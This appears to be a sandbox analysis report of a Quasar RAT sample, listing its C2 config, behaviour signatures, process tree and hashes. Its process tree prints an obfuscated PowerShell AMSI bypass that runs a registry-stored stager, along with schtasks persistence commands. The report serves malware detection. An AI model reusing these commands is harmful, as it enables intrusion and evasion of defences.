Analysis

  • max time kernel
    1800s
  • max time network
    1800s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240419-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240419-enlocale:en-usos:windows10-2004-x64system
  • submitted
    02-05-2024 20:56

General

  • Target

    R0X-Built.exe

  • Size

    409KB

  • MD5

    a0f5aa5764c4f66eee82f857f9f447b6

  • SHA1

    3c3a780d020cb3eb3088223443fe813abb95dccd

  • SHA256

    43c6b9b6c241dbd6ad1bde7980026235373374d5e836fb6c794354a15e678ef3

  • SHA512

    458c03ae490e409598b8e9e89911b0757fb61411fbc45a60ecefed3c13d0fc96b7bc205afe1fb3e0f7585eb163f102754ec9259691eca1bfa00b028f74eb8384

  • SSDEEP

    6144:RMX2pJAJcC0B61K6qZ1fQ57P/EwXhb4azmosb+lfXdOIFyoOOfTA3pwF:lpyJcC+uK6qZ1G8QJjbfNOSOObA3pwF

Malware Config

Extracted

Family

quasar

Version

3.1.5

Botnet

Slave

C2

even-lemon.gl.at.ply.gg:33587

Mutex

$Sxr-3vDee7FzoJnhqjuE3n

Attributes
  • encryption_key

    KaNwItdY6wlv5nCN4prL

  • install_name

    $srr-powershell.exe

  • log_directory

    Logs

  • reconnect_delay

    1000

  • startup_key

    $srr-powershell

  • subdirectory

    Windows

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar payload 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Downloads MZ/PE file
  • Sets service image path in registry 2 TTPs 1 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 20 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 3 IoCs
  • Checks SCSI registry key(s) 3 TTPs 18 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 9 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:608
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:64
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{33d85105-32c1-458c-8bc7-f655ee3ba061}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3480
      • C:\Windows\system32\lsass.exe
        C:\Windows\system32\lsass.exe
        1⤵
          PID:676
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
          1⤵
            PID:956
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
            1⤵
              PID:440
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
              1⤵
                PID:728
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                1⤵
                  PID:1016
                • C:\Windows\System32\svchost.exe
                  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                  1⤵
                    PID:1028
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                    1⤵
                    • Drops file in System32 directory
                    PID:1092
                    • C:\Windows\system32\taskhostw.exe
                      taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                      2⤵
                        PID:2720
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:DajRWynZFFNU{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$gpkxnXjmEEYAft,[Parameter(Position=1)][Type]$IjiVoWgVAD)$KmxzsQgiTsD=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('Re'+'f'+''+[Char](108)+''+[Char](101)+'c'+[Char](116)+''+[Char](101)+''+[Char](100)+'De'+[Char](108)+'e'+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+''+[Char](77)+''+[Char](101)+''+[Char](109)+''+[Char](111)+''+[Char](114)+''+'y'+''+'M'+'o'+'d'+'ule',$False).DefineType(''+[Char](77)+'y'+[Char](68)+''+[Char](101)+'l'+[Char](101)+'g'+[Char](97)+''+'t'+''+[Char](101)+''+[Char](84)+''+'y'+''+'p'+''+'e'+'','C'+'l'+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+'P'+''+[Char](117)+''+'b'+''+'l'+''+'i'+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](101)+''+[Char](97)+''+'l'+'e'+[Char](100)+''+[Char](44)+''+'A'+''+[Char](110)+''+'s'+''+[Char](105)+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+'A'+[Char](117)+'t'+'o'+''+[Char](67)+''+[Char](108)+''+'a'+''+'s'+''+[Char](115)+'',[MulticastDelegate]);$KmxzsQgiTsD.DefineConstructor(''+[Char](82)+''+[Char](84)+'S'+[Char](112)+''+[Char](101)+''+'c'+''+[Char](105)+''+[Char](97)+'lN'+[Char](97)+'m'+[Char](101)+''+[Char](44)+''+'H'+''+[Char](105)+''+[Char](100)+'eB'+[Char](121)+''+[Char](83)+''+'i'+''+'g'+''+[Char](44)+''+[Char](80)+''+'u'+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$gpkxnXjmEEYAft).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+''+'t'+''+'i'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+'ge'+[Char](100)+'');$KmxzsQgiTsD.DefineMethod(''+[Char](73)+''+[Char](110)+''+'v'+'oke',''+[Char](80)+''+'u'+''+'b'+''+[Char](108)+''+'i'+'c'+','+''+'H'+'id'+[Char](101)+''+[Char](66)+'y'+[Char](83)+'i'+[Char](103)+''+[Char](44)+''+[Char](78)+'e'+'w'+''+[Char](83)+''+[Char](108)+'o'+[Char](116)+''+[Char](44)+''+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+'',$IjiVoWgVAD,$gpkxnXjmEEYAft).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+'ti'+'m'+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+'na'+[Char](103)+''+[Char](101)+''+[Char](100)+'');Write-Output $KmxzsQgiTsD.CreateType();}$iBFKOPNALdyyQ=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+[Char](115)+''+[Char](116)+'e'+[Char](109)+''+'.'+''+[Char](100)+''+'l'+''+'l'+'')}).GetType(''+[Char](77)+''+[Char](105)+''+'c'+'r'+'o'+''+[Char](115)+''+[Char](111)+'f'+[Char](116)+'.W'+[Char](105)+'n'+[Char](51)+''+[Char](50)+''+[Char](46)+'U'+[Char](110)+''+[Char](115)+''+[Char](97)+''+[Char](102)+''+'e'+''+[Char](78)+'a'+[Char](116)+''+[Char](105)+''+'v'+''+[Char](101)+''+'M'+''+'e'+'t'+[Char](104)+''+[Char](111)+''+'d'+''+[Char](115)+'');$NqZJsKxmBjFyBT=$iBFKOPNALdyyQ.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+'P'+''+[Char](114)+''+'o'+'c'+[Char](65)+'d'+'d'+''+'r'+''+'e'+'s'+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+'i'+[Char](99)+''+[Char](44)+'S'+[Char](116)+''+'a'+''+[Char](116)+''+[Char](105)+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$EvlSZSPVvEMdZsoCRYH=DajRWynZFFNU @([String])([IntPtr]);$ygVCedOVlraVGKiwoZXDAH=DajRWynZFFNU @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$DsqBGZnfCBG=$iBFKOPNALdyyQ.GetMethod(''+'G'+''+'e'+'t'+[Char](77)+''+'o'+'d'+'u'+'l'+[Char](101)+''+'H'+'a'+[Char](110)+'d'+'l'+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+'r'+'n'+'e'+'l'+''+'3'+'2'+[Char](46)+''+[Char](100)+''+[Char](108)+''+'l'+'')));$aOHozjpIKwLsiC=$NqZJsKxmBjFyBT.Invoke($Null,@([Object]$DsqBGZnfCBG,[Object](''+[Char](76)+'o'+[Char](97)+''+'d'+''+[Char](76)+''+'i'+'br'+[Char](97)+''+[Char](114)+''+[Char](121)+''+'A'+'')));$yJnBCzcgXmTdvlAHR=$NqZJsKxmBjFyBT.Invoke($Null,@([Object]$DsqBGZnfCBG,[Object](''+[Char](86)+''+'i'+''+[Char](114)+'t'+[Char](117)+''+'a'+''+'l'+''+[Char](80)+''+[Char](114)+''+'o'+''+[Char](116)+''+[Char](101)+''+'c'+''+[Char](116)+'')));$cGOoaNP=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($aOHozjpIKwLsiC,$EvlSZSPVvEMdZsoCRYH).Invoke(''+'a'+''+'m'+''+[Char](115)+'i.'+'d'+''+[Char](108)+''+[Char](108)+'');$jnzcLGemEWyWJngsk=$NqZJsKxmBjFyBT.Invoke($Null,@([Object]$cGOoaNP,[Object](''+'A'+''+[Char](109)+''+[Char](115)+'i'+'S'+''+[Char](99)+''+[Char](97)+''+[Char](110)+''+[Char](66)+''+[Char](117)+''+[Char](102)+'fe'+'r'+'')));$eKijTncSqT=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($yJnBCzcgXmTdvlAHR,$ygVCedOVlraVGKiwoZXDAH).Invoke($jnzcLGemEWyWJngsk,[uint32]8,4,[ref]$eKijTncSqT);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$jnzcLGemEWyWJngsk,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($yJnBCzcgXmTdvlAHR,$ygVCedOVlraVGKiwoZXDAH).Invoke($jnzcLGemEWyWJngsk,[uint32]8,0x20,[ref]$eKijTncSqT);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+'F'+''+[Char](84)+'W'+[Char](65)+''+[Char](82)+''+'E'+'').GetValue(''+[Char](36)+''+[Char](55)+''+'7'+''+'s'+'t'+'a'+'ger')).EntryPoint.Invoke($Null,$Null)"
                        2⤵
                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                        • Drops file in System32 directory
                        • Suspicious use of SetThreadContext
                        • Modifies data under HKEY_USERS
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of WriteProcessMemory
                        PID:4048
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                      1⤵
                        PID:1192
                      • C:\Windows\System32\svchost.exe
                        C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                        1⤵
                        • Drops file in System32 directory
                        PID:1200
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                        1⤵
                          PID:1356
                        • C:\Windows\System32\svchost.exe
                          C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                          1⤵
                            PID:1364
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                            1⤵
                              PID:1376
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                              1⤵
                                PID:1388
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                1⤵
                                  PID:1396
                                  • C:\Windows\system32\sihost.exe
                                    sihost.exe
                                    2⤵
                                    • Modifies registry class
                                    PID:2564
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                  1⤵
                                    PID:1480
                                  • C:\Windows\system32\svchost.exe
                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                    1⤵
                                      PID:1584
                                    • C:\Windows\System32\svchost.exe
                                      C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                      1⤵
                                        PID:1648
                                      • C:\Windows\System32\svchost.exe
                                        C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                        1⤵
                                          PID:1664
                                        • C:\Windows\System32\svchost.exe
                                          C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                          1⤵
                                            PID:1752
                                          • C:\Windows\System32\svchost.exe
                                            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                            1⤵
                                              PID:1788
                                            • C:\Windows\system32\svchost.exe
                                              C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                              1⤵
                                                PID:1840
                                              • C:\Windows\System32\svchost.exe
                                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                1⤵
                                                  PID:1848
                                                • C:\Windows\System32\svchost.exe
                                                  C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                  1⤵
                                                    PID:1972
                                                  • C:\Windows\system32\svchost.exe
                                                    C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                    1⤵
                                                      PID:2000
                                                    • C:\Windows\System32\spoolsv.exe
                                                      C:\Windows\System32\spoolsv.exe
                                                      1⤵
                                                        PID:1660
                                                      • C:\Windows\system32\svchost.exe
                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                        1⤵
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:2124
                                                      • C:\Windows\System32\svchost.exe
                                                        C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                        1⤵
                                                          PID:2196
                                                        • C:\Windows\System32\svchost.exe
                                                          C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                          1⤵
                                                            PID:2204
                                                          • C:\Windows\system32\svchost.exe
                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                            1⤵
                                                              PID:2392
                                                            • C:\Windows\system32\svchost.exe
                                                              C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                              1⤵
                                                                PID:2400
                                                              • C:\Windows\system32\svchost.exe
                                                                C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                1⤵
                                                                  PID:2592
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                  1⤵
                                                                  • Drops file in System32 directory
                                                                  PID:2704
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                  1⤵
                                                                    PID:2748
                                                                  • C:\Windows\sysmon.exe
                                                                    C:\Windows\sysmon.exe
                                                                    1⤵
                                                                      PID:2764
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                      1⤵
                                                                        PID:2776
                                                                      • C:\Windows\System32\svchost.exe
                                                                        C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                        1⤵
                                                                          PID:2796
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                          1⤵
                                                                            PID:2844
                                                                          • C:\Windows\system32\wbem\unsecapp.exe
                                                                            C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                            1⤵
                                                                              PID:2756
                                                                            • C:\Windows\system32\svchost.exe
                                                                              C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                              1⤵
                                                                                PID:3332
                                                                              • C:\Windows\Explorer.EXE
                                                                                C:\Windows\Explorer.EXE
                                                                                1⤵
                                                                                • Modifies registry class
                                                                                • Suspicious use of UnmapMainImage
                                                                                PID:3412
                                                                                • C:\Users\Admin\AppData\Local\Temp\R0X-Built.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\R0X-Built.exe"
                                                                                  2⤵
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  • Suspicious use of WriteProcessMemory
                                                                                  PID:1348
                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                    "schtasks" /create /tn "$srr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\R0X-Built.exe" /rl HIGHEST /f
                                                                                    3⤵
                                                                                    • Creates scheduled task(s)
                                                                                    PID:220
                                                                                  • C:\Users\Admin\AppData\Roaming\Windows\$srr-powershell.exe
                                                                                    "C:\Users\Admin\AppData\Roaming\Windows\$srr-powershell.exe"
                                                                                    3⤵
                                                                                    • Executes dropped EXE
                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    • Suspicious use of WriteProcessMemory
                                                                                    PID:4492
                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                      "schtasks" /create /tn "$srr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Windows\$srr-powershell.exe" /rl HIGHEST /f
                                                                                      4⤵
                                                                                      • Creates scheduled task(s)
                                                                                      PID:1688
                                                                                  • C:\Users\Admin\AppData\Local\Temp\install.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\install.exe"
                                                                                    3⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:3300
                                                                                  • C:\Windows\SysWOW64\SCHTASKS.exe
                                                                                    "SCHTASKS.exe" /create /tn "$77R0X-Built.exe" /tr "'C:\Users\Admin\AppData\Local\Temp\R0X-Built.exe'" /sc onlogon /rl HIGHEST
                                                                                    3⤵
                                                                                    • Creates scheduled task(s)
                                                                                    PID:3552
                                                                              • C:\Windows\system32\svchost.exe
                                                                                C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                1⤵
                                                                                  PID:3532
                                                                                • C:\Windows\system32\DllHost.exe
                                                                                  C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                  1⤵
                                                                                    PID:3744
                                                                                  • C:\Windows\System32\RuntimeBroker.exe
                                                                                    C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                    1⤵
                                                                                    • Modifies registry class
                                                                                    PID:3896
                                                                                  • C:\Windows\System32\RuntimeBroker.exe
                                                                                    C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                    1⤵
                                                                                      PID:2944
                                                                                    • C:\Windows\system32\SppExtComObj.exe
                                                                                      C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                      1⤵
                                                                                        PID:4756
                                                                                      • C:\Windows\System32\svchost.exe
                                                                                        C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                        1⤵
                                                                                          PID:4828
                                                                                        • C:\Windows\System32\svchost.exe
                                                                                          C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                          1⤵
                                                                                            PID:1140
                                                                                          • C:\Windows\system32\svchost.exe
                                                                                            C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                            1⤵
                                                                                              PID:2224
                                                                                            • C:\Windows\system32\svchost.exe
                                                                                              C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                              1⤵
                                                                                              • Modifies data under HKEY_USERS
                                                                                              PID:4916
                                                                                            • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                              C:\Windows\system32\wbem\wmiprvse.exe
                                                                                              1⤵
                                                                                                PID:620
                                                                                              • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                1⤵
                                                                                                • Drops file in System32 directory
                                                                                                • Modifies data under HKEY_USERS
                                                                                                PID:2380
                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                1⤵
                                                                                                • Modifies data under HKEY_USERS
                                                                                                PID:3904
                                                                                              • C:\Windows\system32\DllHost.exe
                                                                                                C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                1⤵
                                                                                                • Drops file in System32 directory
                                                                                                PID:4908
                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
                                                                                                1⤵
                                                                                                  PID:368
                                                                                                • C:\Windows\System32\RuntimeBroker.exe
                                                                                                  C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                  1⤵
                                                                                                    PID:2728
                                                                                                  • C:\Windows\System32\RuntimeBroker.exe
                                                                                                    C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                    1⤵
                                                                                                      PID:2240
                                                                                                    • C:\Windows\System32\RuntimeBroker.exe
                                                                                                      C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                      1⤵
                                                                                                      • Modifies registry class
                                                                                                      PID:4864
                                                                                                    • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                      C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                      1⤵
                                                                                                      • Checks BIOS information in registry
                                                                                                      • Checks SCSI registry key(s)
                                                                                                      • Enumerates system info in registry
                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                      PID:1372
                                                                                                    • C:\Windows\System32\WaaSMedicAgent.exe
                                                                                                      C:\Windows\System32\WaaSMedicAgent.exe 20ccbc6f22ee90d26d9a31a5242f9768 +7G6KB8ly0eKEpnPVXkJfg.0.1.0.0.0
                                                                                                      1⤵
                                                                                                      • Sets service image path in registry
                                                                                                      PID:4628
                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        2⤵
                                                                                                          PID:3548
                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
                                                                                                        1⤵
                                                                                                        • Drops file in Windows directory
                                                                                                        PID:3316
                                                                                                      • C:\Windows\servicing\TrustedInstaller.exe
                                                                                                        C:\Windows\servicing\TrustedInstaller.exe
                                                                                                        1⤵
                                                                                                        • Drops file in Windows directory
                                                                                                        PID:4220
                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
                                                                                                        1⤵
                                                                                                        • Checks processor information in registry
                                                                                                        PID:3856
                                                                                                      • C:\Windows\System32\mousocoreworker.exe
                                                                                                        C:\Windows\System32\mousocoreworker.exe -Embedding
                                                                                                        1⤵
                                                                                                        • Checks processor information in registry
                                                                                                        • Enumerates system info in registry
                                                                                                        • Modifies data under HKEY_USERS
                                                                                                        PID:4852
                                                                                                      • C:\Windows\system32\backgroundTaskHost.exe
                                                                                                        "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
                                                                                                        1⤵
                                                                                                          PID:540
                                                                                                        • C:\Windows\system32\BackgroundTransferHost.exe
                                                                                                          "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
                                                                                                          1⤵
                                                                                                            PID:3456
                                                                                                          • C:\Windows\system32\backgroundTaskHost.exe
                                                                                                            "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
                                                                                                            1⤵
                                                                                                              PID:1908
                                                                                                            • C:\Windows\system32\BackgroundTransferHost.exe
                                                                                                              "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
                                                                                                              1⤵
                                                                                                                PID:4328
                                                                                                              • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                1⤵
                                                                                                                • Modifies registry class
                                                                                                                PID:1832
                                                                                                              • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                1⤵
                                                                                                                  PID:4188
                                                                                                                • C:\Windows\system32\DllHost.exe
                                                                                                                  C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                                                                                                  1⤵
                                                                                                                    PID:4996
                                                                                                                  • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                    C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                    1⤵
                                                                                                                      PID:3868
                                                                                                                    • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                      C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                      1⤵
                                                                                                                        PID:1772

                                                                                                                      Network

                                                                                                                      MITRE ATT&CK Matrix ATT&CK v13

                                                                                                                      Execution

                                                                                                                      Scheduled Task/Job

                                                                                                                      1
                                                                                                                      T1053

                                                                                                                      Persistence

                                                                                                                      Boot or Logon Autostart Execution

                                                                                                                      1
                                                                                                                      T1547

                                                                                                                      Registry Run Keys / Startup Folder

                                                                                                                      1
                                                                                                                      T1547.001

                                                                                                                      Scheduled Task/Job

                                                                                                                      1
                                                                                                                      T1053

                                                                                                                      Privilege Escalation

                                                                                                                      Boot or Logon Autostart Execution

                                                                                                                      1
                                                                                                                      T1547

                                                                                                                      Registry Run Keys / Startup Folder

                                                                                                                      1
                                                                                                                      T1547.001

                                                                                                                      Scheduled Task/Job

                                                                                                                      1
                                                                                                                      T1053

                                                                                                                      Defense Evasion

                                                                                                                      Modify Registry

                                                                                                                      1
                                                                                                                      T1112

                                                                                                                      Discovery

                                                                                                                      Query Registry

                                                                                                                      5
                                                                                                                      T1012

                                                                                                                      System Information Discovery

                                                                                                                      4
                                                                                                                      T1082

                                                                                                                      Peripheral Device Discovery

                                                                                                                      1
                                                                                                                      T1120

                                                                                                                      Command and Control

                                                                                                                      Web Service

                                                                                                                      1
                                                                                                                      T1102

                                                                                                                      Replay Monitor

                                                                                                                      Loading Replay Monitor...

                                                                                                                      Downloads

                                                                                                                      • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                                                        Filesize

                                                                                                                        330B

                                                                                                                        MD5

                                                                                                                        6d3b849dc2fd166e27adebe59bc8a1c8

                                                                                                                        SHA1

                                                                                                                        a4a4f4b0cd350b2a1efadc638f08dd8f922e397f

                                                                                                                        SHA256

                                                                                                                        2424621700d8bea7bfe64b651ac39d7915b92f35ddad489e3e94624747cb60da

                                                                                                                        SHA512

                                                                                                                        45b31da1aa0d7712f5c7ab64919e76d650177bc00cb5400aeb3195f220ff36de19a26bde0a0599e906040672713be35008fb84dd3ba68e9eecfc5acbf7ad9ea2

                                                                                                                      • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749
                                                                                                                        Filesize

                                                                                                                        330B

                                                                                                                        MD5

                                                                                                                        c5df0b6fa218b47600bedfdd133793dc

                                                                                                                        SHA1

                                                                                                                        ab6396f70f86d459155c5e2b79afba1c8db6d342

                                                                                                                        SHA256

                                                                                                                        b013c6a526b9c84cd0f7c9d2289cc7d2fd369403a8fbacddc0b6324565b04e10

                                                                                                                        SHA512

                                                                                                                        9bada6e39bcba7306f0868c6a5dad50459c1241d0ff3fc4f46fbcc47234efd8163d55b84f19ab313e29b5d1e2b9adae137432bf78ee6fea4fc836f8099e70c4a

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\install.exe
                                                                                                                        Filesize

                                                                                                                        162KB

                                                                                                                        MD5

                                                                                                                        152e3f07bbaf88fb8b097ba05a60df6e

                                                                                                                        SHA1

                                                                                                                        c4638921bb140e7b6a722d7c4d88afa7ed4e55c8

                                                                                                                        SHA256

